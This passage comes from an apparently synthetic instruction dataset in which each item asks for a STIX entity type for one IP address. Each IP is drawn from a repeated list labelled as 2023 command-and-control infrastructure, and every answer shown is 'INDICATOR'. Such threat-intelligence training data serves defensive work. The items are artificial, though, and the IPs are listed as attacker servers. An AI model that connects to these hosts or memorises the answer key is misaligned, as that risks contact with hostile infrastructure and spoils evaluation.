178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n24.199.107.218\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n45.82.13.84\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n149.28.181.232\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n188.166.7.140\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n167.172.144.127\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 